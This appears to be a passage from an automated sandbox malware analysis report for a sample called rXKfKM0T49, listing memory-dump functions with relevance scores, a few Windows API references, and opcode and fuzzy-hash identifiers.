                                                                                                            • Opcode ID: 129e69ec7c003b1508b11ebde02d2e28ba5e829548fc8e31cbe80e9b099aa93e
                                                                                                            • Instruction ID: 81b0ea4a9550f1076ef71cc7ae8832df0bda5e7686047d6eeb227528d27eb5e9
                                                                                                            • Opcode Fuzzy Hash: 129e69ec7c003b1508b11ebde02d2e28ba5e829548fc8e31cbe80e9b099aa93e
                                                                                                            • Instruction Fuzzy Hash: E31142B1800748CFDB10CFAAC484BDEFBF4EB48320F20846AE958A7200D774A940CFA5
                                                                                                            Function 38A1C60C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,38A1D92F), ref: 38A1E72D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 0f64326dffe67da37c5018b797faa210622d27cd421e864f521fef871b3370cc
                                                                                                            • Instruction ID: d693d6965bc0391be4d70e2085377a390e2f60206fc25887940610f3d6b06c2c
                                                                                                            • Opcode Fuzzy Hash: 0f64326dffe67da37c5018b797faa210622d27cd421e864f521fef871b3370cc
                                                                                                            • Instruction Fuzzy Hash: F311EDB5C04649DFDB10DF9AD444B9EBBF4AB48320F10846AE858A7610D378A544CFA5
                                                                                                            Function 38A1E6C9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,38A1D92F), ref: 38A1E72D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: a849a62430c750a15f80e9e19c2caccf311a0883f7ffc289a4eaf7a3c950906a
                                                                                                            • Instruction ID: dc244b257306528161cea2ee748acdcd986e02c5fd34d4b011e06e57ada74316
                                                                                                            • Opcode Fuzzy Hash: a849a62430c750a15f80e9e19c2caccf311a0883f7ffc289a4eaf7a3c950906a
                                                                                                            • Instruction Fuzzy Hash: 9811F2B5C04649CFDB10DFAAE444BDEBBF4EF48320F14842AD898A7650D778A544CFA5
                                                                                                            Function 38A12020 Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 0d9a78d92bce451da3e2d32e6c64381f74562787e6ce4a09601d4758a78ef9e0
                                                                                                            • Instruction ID: dcb5764bee35d94c16ecd63f54c5b54726d1b76c303fb4b96ba1ded4889fac57
                                                                                                            • Opcode Fuzzy Hash: 0d9a78d92bce451da3e2d32e6c64381f74562787e6ce4a09601d4758a78ef9e0
                                                                                                            • Instruction Fuzzy Hash: FB11F7B5800749DFDB10DF9AD445BDEFBF8EB48720F10841AE958A7210C375A984CFA5
                                                                                                            Function 00150B20 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \'v5
                                                                                                            • API String ID: 0-2991269168
                                                                                                            • Opcode ID: 1bd4502206227a8a3d55f1bdb21ebdd1c2f2ae022be46dc862fcb1c36a1a7997
                                                                                                            • Instruction ID: 5eb8408bd5f8212d3fd1d5de2effc5f1727d90e44176ff2aa2bf5e89027e7f44
                                                                                                            • Opcode Fuzzy Hash: 1bd4502206227a8a3d55f1bdb21ebdd1c2f2ae022be46dc862fcb1c36a1a7997
                                                                                                            • Instruction Fuzzy Hash: CBA11374A00349CFDB44DFB4D894A9DBBB2FB49301B509229E515FB262EB34AD46CF84
                                                                                                            Function 00150B30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \'v5
                                                                                                            • API String ID: 0-2991269168
                                                                                                            • Opcode ID: 93ef79f0f16b8b33c2da1703f3a99134608ed50176192857f21496dabf9f449f
                                                                                                            • Instruction ID: af922ee95f12f4118c84e4ce6f95531d087e02706b566210ccec95a70b74e21e
                                                                                                            • Opcode Fuzzy Hash: 93ef79f0f16b8b33c2da1703f3a99134608ed50176192857f21496dabf9f449f
                                                                                                            • Instruction Fuzzy Hash: C3A1C274A00309CFDB44DFB4D994A9DBBB2FB48301B509229E515FB261EB34A986CF84
                                                                                                            Function 00158BF0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: T
                                                                                                            • API String ID: 0-3187964512
                                                                                                            • Opcode ID: 40e309c5fd7d8355a25a7153bbdce9e628b6715f7291acd600e829016c427669
                                                                                                            • Instruction ID: d9706dc7b5d16df845d644a7ce816abf573a2a322c7d7e802203593214f4b638
                                                                                                            • Opcode Fuzzy Hash: 40e309c5fd7d8355a25a7153bbdce9e628b6715f7291acd600e829016c427669
                                                                                                            • Instruction Fuzzy Hash: 93318F30701244CFEB00DF58C984BAABBE6EB88305F148465ED25EF251EB70DD458BA5
                                                                                                            Function 00154620 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            • 8Ky5DKy5PKy5\Ky5hKy5Ky5, xrefs: 00154640
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8Ky5DKy5PKy5\Ky5hKy5Ky5
                                                                                                            • API String ID: 0-3200053145
                                                                                                            • Opcode ID: 458ff2e96c7cd7fa13a20c48b91e00d95d510042d67a8e6181cd14cc74e452d7
                                                                                                            • Instruction ID: 07b0a7d3997db7daa01d0409d9387c0e45c3433e8f99acbe0e7dc5f32dafc31c
                                                                                                            • Opcode Fuzzy Hash: 458ff2e96c7cd7fa13a20c48b91e00d95d510042d67a8e6181cd14cc74e452d7
                                                                                                            • Instruction Fuzzy Hash: CA31D231204209EFCF159F64D895AAF3BA2FB89305F404024FD259B259CB35CEA5DFA1
                                                                                                            Function 00158729 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: X\y50ay5
                                                                                                            • API String ID: 0-1393065996
                                                                                                            • Opcode ID: 4154554d825560caa58622d6bd6c751d52fe26184a48077407fdc7c4c3354b06
                                                                                                            • Instruction ID: 9f7509e5a035cd6dba9c01cccbcccaf511b823b826e7a1eaff89444c29b7d7e6
                                                                                                            • Opcode Fuzzy Hash: 4154554d825560caa58622d6bd6c751d52fe26184a48077407fdc7c4c3354b06
                                                                                                            • Instruction Fuzzy Hash: 8B216B70A01248DFCB15CFA1D590AEEBFB6AF48301F648069E821FA290DB30DA45DF60
                                                                                                            Function 00154664 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PKy5\Ky5hKy5Ky5
                                                                                                            • API String ID: 0-3356427709
                                                                                                            • Opcode ID: c7968454a20559410b2f66e1ba08b2391e7a74ffa84cafcf37b3229ef156e462
                                                                                                            • Instruction ID: 220f6996195ca5bc4b3e7eeda83480e20d3bf42ca9270dcef7c05fc0f378edad
                                                                                                            • Opcode Fuzzy Hash: c7968454a20559410b2f66e1ba08b2391e7a74ffa84cafcf37b3229ef156e462
                                                                                                            • Instruction Fuzzy Hash: 68012831304105DFCB055F64D8945AA77A1FF493057004025FD15CF256CB35CE66DF50
                                                                                                            Function 001519B8 Relevance: .6, Instructions: 571COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70e024d3ee45e111231669c1eaf4cd8676977c94bdd9a58c77ad7c1eb760745d
                                                                                                            • Instruction ID: 66d0ed4b067bd55ec9cab5dcc01a587d9c763388ee837ba490b1a8a3bb1fdf37
                                                                                                            • Opcode Fuzzy Hash: 70e024d3ee45e111231669c1eaf4cd8676977c94bdd9a58c77ad7c1eb760745d
                                                                                                            • Instruction Fuzzy Hash: 683296EBD1D7E18FC7134B705CB8259BFB16A22106BEF458EC8C296287EBA54485C353
                                                                                                            Function 00154F00 Relevance: .3, Instructions: 329COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3fa6d5bbd1ef4516aedd71c29c074ed1f5d5204970687f2064e6250f8eac52fa
                                                                                                            • Instruction ID: c3e206295821df067a472f2a1ab950b705d0b0cb7b630d6270a14e15433ba15e
                                                                                                            • Opcode Fuzzy Hash: 3fa6d5bbd1ef4516aedd71c29c074ed1f5d5204970687f2064e6250f8eac52fa
                                                                                                            • Instruction Fuzzy Hash: 8EB1DF30304605CFDB199F29C8A4B6E7BA3AF88316F158529E826CF391CB35CD85DB90
                                                                                                            Function 384EC175 Relevance: .3, Instructions: 322COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61e892ce48f69fbafc727d190ac7db1085ea3c991187efb54d618ec747c6e9fa
                                                                                                            • Instruction ID: ca674f190fc0eae16447ca21b647766944ef9d8ba77252812033eead2a3101c6
                                                                                                            • Opcode Fuzzy Hash: 61e892ce48f69fbafc727d190ac7db1085ea3c991187efb54d618ec747c6e9fa
                                                                                                            • Instruction Fuzzy Hash: 90E1E234A00318DFDB25DFA1C894BADB7B2EB89301F5085A9D91AB7391CB355E82DF50
                                                                                                            Function 384EC173 Relevance: .3, Instructions: 319COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9822de7b886ad7f9996a73d5b995ac16542c54153350cd4e378b25293dfe245b
                                                                                                            • Instruction ID: 217a079598793701786788ea2c8be67528ae93372ddb7065730bb3949cd09533
                                                                                                            • Opcode Fuzzy Hash: 9822de7b886ad7f9996a73d5b995ac16542c54153350cd4e378b25293dfe245b
                                                                                                            • Instruction Fuzzy Hash: 7AE1E134A00318DFDB25DFA1C894BADB7B2EB89301F5085A9D91AB7391CB355E82DF50
                                                                                                            Function 00155460 Relevance: .2, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 321a52e0abd5047bb3362cf4270791f75de1d14bb57372d46ba7d844a1551610
                                                                                                            • Instruction ID: b3c3feca6da97692d82a830a9ad75b84096e6562586e37a2380ab30b812ca410
                                                                                                            • Opcode Fuzzy Hash: 321a52e0abd5047bb3362cf4270791f75de1d14bb57372d46ba7d844a1551610
                                                                                                            • Instruction Fuzzy Hash: A0819130B10945CFCB18CF69C8A49AAB7B3BF88316B658069D825DF365EB31EC45CB51
                                                                                                            Function 00156C98 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 907983f872a9b5e41c0f3df9af18b120a0b86e5b7c7ddc85c047b4295c891f1e
                                                                                                            • Instruction ID: 5b09f162a57b005c9e66e72bc1dcbc09e34e76005a210dc868ef5e0a7f290cb2
                                                                                                            • Opcode Fuzzy Hash: 907983f872a9b5e41c0f3df9af18b120a0b86e5b7c7ddc85c047b4295c891f1e
                                                                                                            • Instruction Fuzzy Hash: 0B710434700205CFCB18DF68C895A6A7BF6EF59742B5944A9E822CB3B1DB74EC45CB90
                                                                                                            Function 0015AF90 Relevance: .2, Instructions: 195COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 62f6d9ca3cfb67ed19ce9aedae71d58d8a02b2623137e10d2ae0574af6e55648
                                                                                                            • Instruction ID: 89936af4e8e7a5672508e420202f9e790f939359f7317493b0b131c19e8499a2
                                                                                                            • Opcode Fuzzy Hash: 62f6d9ca3cfb67ed19ce9aedae71d58d8a02b2623137e10d2ae0574af6e55648
                                                                                                            • Instruction Fuzzy Hash: 0B714B31608615CFDB14CF68D8D8A6ABBB5FF45312B568494FC299F2A2C731EC44CB91
                                                                                                            Function 384EFAB0 Relevance: .2, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b10c9a29f1089b65a70d5da967465cdeb0bc72df6827c81c56abdb781530cf16
                                                                                                            • Instruction ID: aedbcf1cb27984ad449b6b262d9cbeb11e24aad09c27bcb2c5d81d82411b0c31
                                                                                                            • Opcode Fuzzy Hash: b10c9a29f1089b65a70d5da967465cdeb0bc72df6827c81c56abdb781530cf16
                                                                                                            • Instruction Fuzzy Hash: 9871D475E00319DFDB15DFB5C898AADBFB2AF88301F10852AE406AB350DB389942DF55
                                                                                                            Function 384EBA88 Relevance: .2, Instructions: 158COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70594f93ebafca4501417af72bc8264f723b159cd8f5194ddfe0568ac363f3f1
                                                                                                            • Instruction ID: 690c2c9958b02bc6369274411ae391357dc778e49ad358ece89de9a891e2e1db
                                                                                                            • Opcode Fuzzy Hash: 70594f93ebafca4501417af72bc8264f723b159cd8f5194ddfe0568ac363f3f1
                                                                                                            • Instruction Fuzzy Hash: 00611474E01248CFEB14DFE8D98069DBBB2BF88302F248569E454BB795DB34A942CB54
                                                                                                            Function 384EC4CF Relevance: .2, Instructions: 155COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a7cb3bf355acfd59c583ba5436a6754c393c9e233ba5992f58f188b3969c7b7d
                                                                                                            • Instruction ID: 71afea0ced386bae706df5ea20602a1dd1a1cf814fd560cf15838d52cbc08d21
                                                                                                            • Opcode Fuzzy Hash: a7cb3bf355acfd59c583ba5436a6754c393c9e233ba5992f58f188b3969c7b7d
                                                                                                            • Instruction Fuzzy Hash: FD611734A00359DFEB15DFA1C894BADB772FB88300F5084AA9A1AB7755CB365D92DF00
                                                                                                            Function 384ED548 Relevance: .2, Instructions: 151COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e33a5ae6cfa2df4dcb6a54080453c9b883c2bbe5504b0a0450ae7278a6aaa49e
                                                                                                            • Instruction ID: d25d408a8fde5b47b509c0da5ddd15a9162b047dd6ef102ae4d0c4bf6edcff97
                                                                                                            • Opcode Fuzzy Hash: e33a5ae6cfa2df4dcb6a54080453c9b883c2bbe5504b0a0450ae7278a6aaa49e
                                                                                                            • Instruction Fuzzy Hash: EF518470A0020ADFCB05EFA4D895A9EBBB2FF49300F1085A5D105BB265DB35AE45CF61
                                                                                                            Function 384E7920 Relevance: .1, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ba1aa0fa96b2d4cce92724f5de8623d09e691525e28da42ccccc780d55ff5ff
                                                                                                            • Instruction ID: 57fecc5511e78abbe5f26b9653bd128c606996debc8ae39046a40e0c1bc99ff1
                                                                                                            • Opcode Fuzzy Hash: 4ba1aa0fa96b2d4cce92724f5de8623d09e691525e28da42ccccc780d55ff5ff
                                                                                                            • Instruction Fuzzy Hash: DB51FF74D01318DFEB14DFA5D994BADBBB2BF88300F608129E809AB355DB356986DF40
                                                                                                            Function 384ECC28 Relevance: .1, Instructions: 145COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f63fd230337877ebcd460376793e7d04fd928b21b2b5a4cd99f7652124a688ad
                                                                                                            • Instruction ID: 6d6fbd884d50537731caa399aa96013ad53a45b074dc9166adae697626bcbb41
                                                                                                            • Opcode Fuzzy Hash: f63fd230337877ebcd460376793e7d04fd928b21b2b5a4cd99f7652124a688ad
                                                                                                            • Instruction Fuzzy Hash: D551A175E00218DFDB54DFA9C894ADDBBB2FF89300F648169D809AB365DB316946CF40
                                                                                                            Function 00153168 Relevance: .1, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7d05756dd4323ea3fe40e18929089570f967c41b1cbd4e64a9b271dbf245de06
                                                                                                            • Instruction ID: d873a2d81705f484293aaba7a025244bceceede4d24f5917ae3315ea95aab94e
                                                                                                            • Opcode Fuzzy Hash: 7d05756dd4323ea3fe40e18929089570f967c41b1cbd4e64a9b271dbf245de06
                                                                                                            • Instruction Fuzzy Hash: 3C51A374E01208DFCB48DFAAD48499DBBB2FF89301B608169E815BB324DB35A846CF54
                                                                                                            Function 384E8721 Relevance: .1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9331ba50662fe112eb25608a1d65999e24c6350c7c959a03015ea78bcbf13886
                                                                                                            • Instruction ID: 220892530a316ff8444a384d8eca51a7cd97284478715412db2afc35f815d018
                                                                                                            • Opcode Fuzzy Hash: 9331ba50662fe112eb25608a1d65999e24c6350c7c959a03015ea78bcbf13886
                                                                                                            • Instruction Fuzzy Hash: 91518D74D01228CFDB64DFA8C984BDDBBB2BB49302F5055AAE409A7350DB35AE85CF50
                                                                                                            Function 001592C3 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fdaa5c0b5f8384355ec7c20e39c51222858bffaaf13316baf4a49d03630a4971
                                                                                                            • Instruction ID: 10fcac9901df310fb4fc4b1ade6ae7513beca22c4759925765825283bdc33408
                                                                                                            • Opcode Fuzzy Hash: fdaa5c0b5f8384355ec7c20e39c51222858bffaaf13316baf4a49d03630a4971
                                                                                                            • Instruction Fuzzy Hash: 5D41AE31A04249DFCF15CFA4C984A9EBBB2BF49312F048156ED21AF2A1D330ED59CB91
                                                                                                            Function 00159EB0 Relevance: .1, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 732c21d5c34061f260edd58484c49363d1d6ab3ec4611da548ab6ff28de486f0
                                                                                                            • Instruction ID: b6a270194edd4873f7ce48e02021e9d2e491c1473d397413f2e191b044aba2a5
                                                                                                            • Opcode Fuzzy Hash: 732c21d5c34061f260edd58484c49363d1d6ab3ec4611da548ab6ff28de486f0
                                                                                                            • Instruction Fuzzy Hash: 04412531B04204DFCB199B75C854AAEBBB6AFC8711F14406AE916EB7A1CF319D05CBA1
                                                                                                            Function 00152C88 Relevance: .1, Instructions: 112COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f00d753d584c4e17d01e89e28cf56f6201ceb04019119773c2ecbd38c371d85f
                                                                                                            • Instruction ID: a3270cc409ff6c3bb482094d96d64b4e1c6ec1e5ecbe15d5d109ac0e612bb014
                                                                                                            • Opcode Fuzzy Hash: f00d753d584c4e17d01e89e28cf56f6201ceb04019119773c2ecbd38c371d85f
                                                                                                            • Instruction Fuzzy Hash: 4B319233B00315CBEF1C46E6989427E62A6BBD6352F184039DC26DB390DFB98C499691
                                                                                                            Function 384EFA68 Relevance: .1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 394493e150205e1972093a9c3a027ce5d98f98cf51512868575818fc616d6a66
                                                                                                            • Instruction ID: 870dde402f23a9a8c2ca1fa628e1f26540564c0d766cac473e55584334ffe4eb
                                                                                                            • Opcode Fuzzy Hash: 394493e150205e1972093a9c3a027ce5d98f98cf51512868575818fc616d6a66
                                                                                                            • Instruction Fuzzy Hash: 6C31B935E003148BEB09DB79C8546AD7FF2AF89341F14856AE406EB391DF389842CBA1
